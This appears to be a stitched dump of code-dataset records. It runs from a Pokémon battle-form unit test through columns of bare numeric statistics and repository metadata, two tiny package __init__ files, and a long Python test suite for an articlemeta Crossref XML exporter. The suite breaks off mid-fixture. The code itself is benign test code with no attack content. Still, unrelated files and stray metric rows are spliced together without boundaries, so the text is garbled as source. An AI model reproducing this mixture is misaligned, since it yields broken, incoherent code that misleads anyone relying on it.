    def test_cannot_create_battle_if_pokemon_points_sum_more_than_600(self):
        # Mock the PokeAPI existence checks for the three fixture names.
        for name in ("pokemon1", "pokemon2", "pokemon3"):
            responses.add(
                responses.HEAD, f"{POKEAPI_BASE_URL}pokemon/{name}", status=200
            )
        # Three maxed pokemon sum to 900 points, over the 600 limit.
        team = [self._make_maxed_pokemon(i) for i in (1, 2, 3)]
        data = {
            f"opponent_pokemon_{i}": pokemon.id
            for i, pokemon in enumerate(team, start=1)
        }
        form = BattleOpponentPokemonsForm(data=data)
        self.assertFalse(form.is_valid())
        self.assertEqual(["Pokemons' points sum cannot be more than 600"], form.errors["__all__"])
| 34.246377
| 98
| 0.583263
| 1,029
| 9,452
| 5.165209
| 0.087464
| 0.038946
| 0.042145
| 0.070555
| 0.90969
| 0.868485
| 0.864346
| 0.856444
| 0.856444
| 0.856444
| 0
| 0.041723
| 0.300148
| 9,452
| 275
| 99
| 34.370909
| 0.761754
| 0
| 0
| 0.821577
| 0
| 0
| 0.270948
| 0.123783
| 0
| 0
| 0
| 0
| 0.058091
| 1
| 0.020747
| false
| 0
| 0.020747
| 0
| 0.049793
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
47a20e61cff5232c965e6a3ea652b8ca0a24f015
| 139
|
py
|
Python
|
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | null | null | null |
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | 4
|
2018-08-24T12:49:33.000Z
|
2018-10-25T08:46:05.000Z
|
datascrubber/tasks/__init__.py
|
alphagov/govuk-datascrubber
|
0b2b4c9f62ddf52d83b56ddf57bde25cb9be686f
|
[
"MIT"
] | 3
|
2019-08-29T13:58:49.000Z
|
2021-04-10T19:41:20.000Z
|
from .whitehall import scrub_whitehall
from .email_alert_api import scrub_email_alert_api
from .publishing_api import scrub_publishing_api
| 34.75
| 50
| 0.892086
| 21
| 139
| 5.47619
| 0.380952
| 0.286957
| 0.226087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086331
| 139
| 3
| 51
| 46.333333
| 0.905512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
47e98cee7aa9db035f96bc26de80569af4205ace
| 275
|
py
|
Python
|
awesome_autodl/data_cls/__init__.py
|
DestinyMy/Awesome-NAS
|
723654525ba02b07d28494919c9c83edbd64964a
|
[
"MIT"
] | 1,135
|
2019-04-20T13:23:06.000Z
|
2020-07-22T14:29:06.000Z
|
awesome_autodl/data_cls/__init__.py
|
D-X-Y/awesome-AutoML
|
204cfc316b2d914b72769c59c2e7fe75d477397c
|
[
"MIT"
] | 17
|
2019-05-14T16:47:45.000Z
|
2020-07-09T23:58:33.000Z
|
awesome_autodl/data_cls/__init__.py
|
D-X-Y/awesome-AutoML
|
204cfc316b2d914b72769c59c2e7fe75d477397c
|
[
"MIT"
] | 183
|
2019-04-22T11:51:54.000Z
|
2020-07-21T11:04:35.000Z
|
#####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2022.01 #
#####################################################
from awesome_autodl.data_cls.abbrv import BibAbbreviations
from awesome_autodl.data_cls.paper import AutoDLpaper
| 45.833333
| 58
| 0.494545
| 26
| 275
| 5.076923
| 0.769231
| 0.166667
| 0.257576
| 0.318182
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 0.069091
| 275
| 5
| 59
| 55
| 0.492188
| 0.178182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
47eda9f337de3f42ee19de166b7cfcc789520eb0
| 79,862
|
py
|
Python
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 6
|
2016-01-06T09:32:00.000Z
|
2021-11-17T18:09:32.000Z
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 99
|
2015-03-31T19:27:30.000Z
|
2021-12-13T19:47:41.000Z
|
tests/test_export_crossref.py
|
robertatakenaka/articles_meta
|
75ebb158d0ca801f3495a80ec7352c8393eda541
|
[
"BSD-2-Clause"
] | 12
|
2015-10-02T15:45:57.000Z
|
2021-08-20T22:35:15.000Z
|
# coding: utf-8
import unittest
import json
import os
import io
from lxml import etree as ET
from articlemeta import export_crossref
from articlemeta import export
from articlemeta.export import CustomArticle as Article
def create_xmlcrossref_with_journal_element(journal_child_name=None):
    """Build a minimal ``<doi_batch><body><journal/></body></doi_batch>`` tree.

    When *journal_child_name* is non-empty, an element with that tag is
    appended under ``<journal>``.
    """
    journal = ET.Element('journal')
    # Truthiness check on purpose: None or '' both mean "no child".
    if journal_child_name:
        journal.append(ET.Element(journal_child_name))
    body = ET.Element('body')
    body.append(journal)
    root = ET.Element('doi_batch')
    root.append(body)
    return root
def create_xmlcrossref_with_n_journal_article_element(
        languages, journal_article_child_name=None):
    """Build a ``<doi_batch>`` tree with one ``<journal_article>`` per entry.

    *languages* is an iterable of ``(lang, doi)`` pairs; only the language
    is used here. Each article carries ``language`` and
    ``publication_type="full_text"`` attributes and, when
    *journal_article_child_name* is non-empty, a child element of that name.
    """
    journal = ET.Element('journal')
    for lang, _doi in languages:
        article = ET.Element('journal_article')
        article.set('language', lang)
        article.set('publication_type', 'full_text')
        # Truthiness check on purpose: None or '' both mean "no child".
        if journal_article_child_name:
            article.append(ET.Element(journal_article_child_name))
        journal.append(article)
    body = ET.Element('body')
    body.append(journal)
    root = ET.Element('doi_batch')
    root.append(body)
    return root
class ExportCrossRef_one_DOI_only_Tests(unittest.TestCase):
def setUp(self):
with open(
os.path.dirname(__file__)+'/fixtures/article_meta.json') as fp:
self._raw_json = json.loads(fp.read())
self._article_meta = Article(self._raw_json)
def test_doi_batch_element(self):
data = [None, None]
xmlcrossref = export_crossref.SetupDoiBatchPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('doi_batch', xml.tag)
def test_doi_batch_id_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLDoiBatchIDPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('doi_batch_id', xml.find('head/doi_batch_id').tag)
def test_depositor_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLDepositorPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><head><depositor><depositor_name>depositor</depositor_name><email_address>name@domain.com</email_address></depositor></head></doi_batch>', ET.tostring(xml))
def test_registrant_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLRegistrantPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><head><registrant>registrant</registrant></head></doi_batch>', ET.tostring(xml))
def test_time_stamp_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('head'))
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLTimeStampPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('timestamp', xml.find('head/timestamp').tag)
def test_head_element(self):
xmlcrossref = ET.Element('doi_batch')
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLHeadPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('head', xml.find('head').tag)
def test_body_element(self):
xmlcrossref = ET.Element('doi_batch')
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLBodyPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual('body', xml.find('body').tag)
def test_journal_element(self):
xmlcrossref = ET.Element('doi_batch')
xmlcrossref.append(ET.Element('body'))
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal/></body></doi_batch>', ET.tostring(xml))
def test_journal_metadata_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [None, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalMetadataPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata/></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_title_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><full_title>Revista de Saúde Pública</full_title></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_abbreviated_journal_title_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLAbbreviatedJournalTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><abbrev_title>Rev. Saúde Pública</abbrev_title></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_issn_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_metadata'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLISSNPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_metadata><issn media_type="print">0034-8910</issn></journal_metadata></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_issue_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalIssuePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>', ET.tostring(xml))
def test_publication_date_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLPubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><publication_date media_type="online"><month>08</month><year>2010</year></publication_date></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_volume_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLVolumePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><journal_volume><volume>44</volume></journal_volume></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_number_element(self):
xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_issue><issue>4</issue></journal_issue></journal></body></doi_batch>', ET.tostring(xml))
def test_journal_article_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalArticlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article language="pt" publication_type="full_text" reference_distribution_opts="any"/></journal></body></doi_batch>', ET.tostring(xml))
def test_article_titles_element(self):
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><titles/></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_title_element(self):
xmlcrossref = ET.Element('doi_batch')
titles = ET.Element('titles')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal_article.append(titles)
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><titles><title>Perfil epidemiológico dos pacientes em terapia renal substitutiva no Brasil, 2000-2004</title></titles></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_contributors_element(self):
raw_json = self._raw_json.copy()
raw_json['article']['v10'][0]['r'] = 'ed'
raw_json['article']['v10'][1]['r'] = 'org'
raw_json['article']['v10'][2]['r'] = 'tr'
raw_json['article']['v10'][3]['r'] = 'coord'
raw_json['article']['v10'][-1]['r'] = 'inventor'
self._article_meta = Article(raw_json)
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleContributorsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><contributors><person_name contributor_role="editor" sequence="first"><given_name>Mariangela Leal</given_name><surname>Cherchiglia</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Elaine Leandro</given_name><surname>Machado</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="translator" sequence="additional"><given_name>Daniele Araújo Campo</given_name><surname>Szuster</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Eli Iola Gurgel</given_name><surname>Andrade</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Francisco de Assis</given_name><surname>Acúrcio</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Waleska Teixeira</given_name><surname>Caiaffa</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Ricardo</given_name><surname>Sesso</surname><affiliation>Universidade Federal de São Paulo, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Augusto A</given_name><surname>Guerra Junior</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL; Universidade Federal de São Paulo, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Odilon Vanni de</given_name><surname>Queiroz</surname><affiliation>Universidade 
Federal de Minas Gerais, BRAZIL</affiliation></person_name><person_name contributor_role="author" sequence="additional"><given_name>Isabel Cristina</given_name><surname>Gomes</surname><affiliation>Universidade Federal de Minas Gerais, BRAZIL</affiliation></person_name></contributors></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_publication_date_element(self):
xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
xmlcrossref.append(body)
data = [self._article_meta, xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>08</month><year>2010</year></publication_date></journal_article></journal></body></doi_batch>', ET.tostring(xml))
def test_article_pages_element(self):
    """XMLPagesPipe writes first_page/last_page from the remaining v14 entry."""
    self._article_meta.data['article']['v14'].pop()
    doi_batch = ET.Element('doi_batch')
    body_el = ET.SubElement(doi_batch, 'body')
    journal_el = ET.SubElement(body_el, 'journal')
    article_el = ET.SubElement(journal_el, 'journal_article')
    article_el.set('publication_type', 'full_text')
    pipe = export_crossref.XMLPagesPipe()
    raw, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(
        b'<doi_batch><body><journal>'
        b'<journal_article publication_type="full_text">'
        b'<pages><first_page>639</first_page><last_page>649</last_page></pages>'
        b'</journal_article></journal></body></doi_batch>',
        ET.tostring(xml))
def test_article_pid_element(self):
    """XMLPIDPipe stores the SciELO PID as a pii identifier in publisher_item."""
    doi_batch = ET.Element('doi_batch')
    body_el = ET.SubElement(doi_batch, 'body')
    journal_el = ET.SubElement(body_el, 'journal')
    article_el = ET.SubElement(journal_el, 'journal_article')
    article_el.set('publication_type', 'full_text')
    pipe = export_crossref.XMLPIDPipe()
    raw, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(
        b'<doi_batch><body><journal>'
        b'<journal_article publication_type="full_text"><publisher_item>'
        b'<identifier id_type="pii">S0034-89102010000400007</identifier>'
        b'</publisher_item></journal_article></journal></body></doi_batch>',
        ET.tostring(xml))
def test_xmlclose_pipe(self):
    """XMLClosePipe serializes the tree as bytes with an XML declaration."""
    doi_batch = ET.Element('doi_batch')
    ET.SubElement(doi_batch, 'head')
    pipe = export_crossref.XMLClosePipe()
    output = pipe.transform([None, doi_batch])
    expected = b"<?xml version='1.0' encoding='utf-8'?>\n<doi_batch><head/></doi_batch>"
    self.assertEqual(expected, output)
def test_validating_against_schema(self):
    """The full crossref pipeline output must validate against the 4.4.0 XSD.

    Fixes two issues in the previous version: the schema file handle leaked
    if ``ET.parse(fp)`` raised (now a ``with`` block), and ``assertValid`` /
    ``validate`` were each called redundantly (three assertions for one fact).
    """
    xml = export.Export(self._raw_json).pipeline_crossref()
    xmlio = ET.parse(io.BytesIO(xml))
    xsd_path = os.path.join(
        os.path.dirname(__file__), 'xsd', 'scielo_crossref', 'crossref4.4.0.xsd')
    with open(xsd_path) as fp:
        schema = ET.XMLSchema(ET.parse(fp))
    # assertValid raises DocumentInvalid with a detailed message on failure;
    # validate() is kept as an explicit boolean check for the test report.
    schema.assertValid(xmlio)
    self.assertTrue(schema.validate(xmlio))
def test_journal_article_should_contain_item_number_with_elocation_id(self):
    """XMLElocationPipe adds an item_number into an existing publisher_item."""
    doi_batch = ET.Element("doi_batch")
    body_el = ET.SubElement(doi_batch, "body")
    journal_el = ET.SubElement(body_el, "journal")
    article_el = ET.SubElement(journal_el, "journal_article")
    article_el.set("publication_type", "full_text")
    ET.SubElement(article_el, "publisher_item")
    pipe = export_crossref.XMLElocationPipe()
    _, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(
        b'<doi_batch><body><journal>'
        b'<journal_article publication_type="full_text"><publisher_item>'
        b'<item_number item_number_type="article_number">53</item_number>'
        b'</publisher_item></journal_article></journal></body></doi_batch>',
        ET.tostring(xml)
    )
def test_elocation_id_pipeline_should_create_publisher_item(self):
    """When no publisher_item exists yet, XMLElocationPipe creates one itself."""
    self._article_meta.data['article']['v14'].pop(0)
    doi_batch = ET.Element("doi_batch")
    body_el = ET.SubElement(doi_batch, "body")
    journal_el = ET.SubElement(body_el, "journal")
    article_el = ET.SubElement(journal_el, "journal_article")
    article_el.set("publication_type", "full_text")
    pipe = export_crossref.XMLElocationPipe()
    _, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(
        b'<doi_batch><body><journal>'
        b'<journal_article publication_type="full_text"><publisher_item>'
        b'<item_number item_number_type="article_number">53</item_number>'
        b'</publisher_item></journal_article></journal></body></doi_batch>',
        ET.tostring(xml)
    )
def test_journal_article_should_not_contains_publisher_item_and_item_number(self):
    """Without elocation data the pipe must leave journal_article untouched."""
    self._article_meta.data['article']['v14'].pop()
    doi_batch = ET.Element("doi_batch")
    body_el = ET.SubElement(doi_batch, "body")
    journal_el = ET.SubElement(body_el, "journal")
    article_el = ET.SubElement(journal_el, "journal_article")
    article_el.set("publication_type", "full_text")
    pipe = export_crossref.XMLElocationPipe()
    _, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(
        b'<doi_batch><body><journal>'
        b'<journal_article publication_type="full_text"/>'
        b'</journal></body></doi_batch>',
        ET.tostring(xml),
    )
def test_every_journal_article_must_contain_own_license(self):
    """Each journal_article gets its own AccessIndicators program holding
    three license_ref elements plus free_to_read."""
    AI = "{http://www.crossref.org/AccessIndicators.xsd}"
    self._article_meta.data["license"] = "by/4.0"
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ["pt", "en", "es"]
    )
    pipe = export_crossref.XMLPermissionsPipe()
    _, xml = pipe.transform([self._article_meta, doi_batch])
    self.assertEqual(3, len(xml.findall(".//" + AI + "program")))
    for journal_article in xml.findall(".//journal_article"):
        with self.subTest(journal_article=journal_article):
            programs = journal_article.findall(".//" + AI + "program")
            self.assertIsNotNone(programs)
            self.assertEqual(1, len(programs))
            self.assertEqual(
                3,
                len(programs[0].findall(AI + "license_ref")),
            )
            self.assertIsNotNone(
                programs[0].findall(AI + "free_to_read")
            )
def test_journal_article_should_not_contain_licenses(self):
    """Without license data no license_ref elements may be emitted.

    The previous assertion ``assertIsNotNone(xml.findall(...))`` was vacuous:
    ``findall`` always returns a list (possibly empty), never ``None``, so the
    test could never fail.  Assert the absence of ``license_ref`` elements
    instead, which is what the test name promises.
    """
    xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
        ["pt", "en", "es"]
    )
    data = [self._article_meta, xmlcrossref]
    pipe = export_crossref.XMLPermissionsPipe()
    _, xml = pipe.transform(data)
    license_refs = xml.findall(
        ".//{http://www.crossref.org/AccessIndicators.xsd}license_ref"
    )
    self.assertEqual([], license_refs)
def test_date_pipe_should_includes_year_when_it_is_valid(self):
    """A citation dated 20060320 yields a cYear element containing '2006'."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(["pt"])
    self._raw_json["citations"] = [{"v65": [{"_": "20060320"}]}]
    pipe = export_crossref.XMLArticleCitationsPipe()
    raw, xml = pipe.transform([Article(self._raw_json), doi_batch])
    # a citation node must exist for the cYear check to be meaningful
    self.assertIsNotNone(xml.find(".//citation"))
    c_year = xml.find(".//cYear")
    self.assertIsNotNone(c_year)
    self.assertEqual("2006", c_year.text)
def test_date_pipe_should_not_includes_year_when_it_is_zero(self):
    """A citation dated '0000' must not produce any cYear element."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(["pt"])
    self._raw_json["citations"] = [{"v65": [{"_": "0000"}]}]
    pipe = export_crossref.XMLArticleCitationsPipe()
    raw, xml = pipe.transform([Article(self._raw_json), doi_batch])
    self.assertIsNotNone(xml.find(".//citation"))  # citation itself exists
    self.assertIsNone(xml.find(".//cYear"))
class ExportCrossRef_MultiLingueDoc_with_MultipleDOI_Tests(unittest.TestCase):
    """Crossref export tests for a multilingual document (pt original with
    en/es translations) in which every language version has its own DOI
    registered in field ``v337``."""

    def setUp(self):
        """Build the Article fixture shared by every test in this class.

        Field guide for the ISIS/SciELO tags used below:
          v880 PID; v237 document-level DOI; v223 publication date
          (YYYYMMDD); v65 publication year; v601 translation languages;
          v40 original language; v10 authors; v14 page range; v12 titles
          per language; v337 per-language DOIs; v83 abstracts per language.
        """
        article_json = {
            # per-language full-text URLs, by format
            "fulltexts": {
                "pdf": {
                    "es": "http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
                    "en": "http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
                    "pt": "http://www.scielo.br/pdf/rsp/v44n4/07.pdf"
                },
                "html": {
                    "es": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=es",
                    "en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=en",
                    "pt": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=pt"
                }
            },
            "collection": "scl",
            "doi": "10.1590/S0034-89102010000400007",
            "body": {
                "pt": "Body PT",
                "es": "Body ES",
                "en": "Body EN"
            },
            "article": {
                "v880": [{"_": "S0034-89102010000400007"}],  # PID
                "v237": [{"_": "10.1590/S0034-89102010000400007"}],  # document DOI
                "v223": [{"_": "20100801"}],  # publication date
                "v65": [{"_": "2010"}],  # publication year
                "v601": [{"_": "en"}, {"_": "es"},],  # translation languages
                "v40": [{"_": "pt"}],  # original language
                "v10": [{"s": "Bamgboye", "r": "ND", "_": "", "n": "EL"}],  # authors
                "v14": [{"f": "14", "l": "20",}],  # first/last page
                # titles per language (implicit string concatenation below)
                "v12": [
                    {"l": "pt",
                     "_": "Perfil epidemiológico dos pacientes em terapia"
                     " renal substitutiva no Brasil, 2000-2004"},
                    {"l": "en",
                     "_": "Epidemiological profile of patients on"
                     " renal replacement therapy in Brazil, 2000-2004"},
                    {"l": "es",
                     "_": "Perfil epidemiológico de los pacientes en terapia"
                     " renal substitutiva en Brasil, 2000-2004"}
                ],
                # one DOI per language version — the distinguishing feature
                # of this test class
                "v337": [
                    {"l": "pt", "d": "10.1590/S0034-89102010000400007",},
                    {"l": "en", "d": "10.1590/ID.en"},
                    {"l": "es", "d": "10.1590/ID.es"}
                ],
                # abstracts per language
                "v83": [
                    {"a": "OBJETIVO: Descrever o perfil epidemiol\u00f3gico e cl\u00ednico de pacientes em terapia renal substitutiva, identificando fatores associados ao risco de morte. M\u00c9TODOS: Estudo observacional, prospectivo n\u00e3o concorrente, a partir de dados de 90.356 pacientes da Base Nacional em Terapias Renais Substitutivas, no Brasil. Foi realizado relacionamento determin\u00edstico-probabil\u00edstico do Sistema de Autoriza\u00e7\u00e3o de Procedimentos de Alta Complexidade/Custo e do Sistema de Informa\u00e7\u00e3o de Mortalidade. Foram inclu\u00eddos todos os pacientes incidentes que iniciaram di\u00e1lise entre 1/1/2000 e 31/12/2004, acompanhados at\u00e9 a morte ou final de 2004. Idade, sexo, regi\u00e3o de resid\u00eancia, doen\u00e7a renal prim\u00e1ria, causa do \u00f3bito foram analisados. Ajustou-se um modelo de riscos proporcionais para identificar fatores associados ao risco de morte. RESULTADOS: Ocorreu um aumento m\u00e9dio de 5,5% na preval\u00eancia de pacientes em terapia enquanto a incid\u00eancia manteve-se est\u00e1vel no per\u00edodo. Hemodi\u00e1lise foi a modalidade inicial predominante (89%). A maioria dos pacientes era do sexo masculino, com idade m\u00e9dia de 53 anos, residente na regi\u00e3o Sudeste, e apresentava causa indeterminada como principal causa b\u00e1sica da doen\u00e7a renal cr\u00f4nica, seguida da hipertens\u00e3o, diabetes e glomerulonefrites. Desses pacientes, 7% realizou transplante renal e 42% evoluiu para o \u00f3bito. Os pacientes em di\u00e1lise peritoneal eram mais idosos e apresentavam maior preval\u00eancia de diabetes. Entre os n\u00e3o transplantados, 45% foi a \u00f3bito e, entre os transplantados, 7%. No modelo final de riscos proporcionais de Cox, o risco de mortalidade foi associado com o aumento da idade, sexo feminino, ter diabetes, residir nas regi\u00f5es Norte e Nordeste, di\u00e1lise peritoneal como modalidade de entrada e n\u00e3o ter realizado transplante renal. CONCLUS\u00d5ES: Houve aumento da preval\u00eancia de pacientes em terapia renal no Brasil. Pacientes com idade avan\u00e7ada, diabetes, do sexo feminino, residentes nas regi\u00f5es Norte e Nordeste e sem transplante renal apresentam maior risco de morte.",
                     "l": "pt",
                     "_": ""},
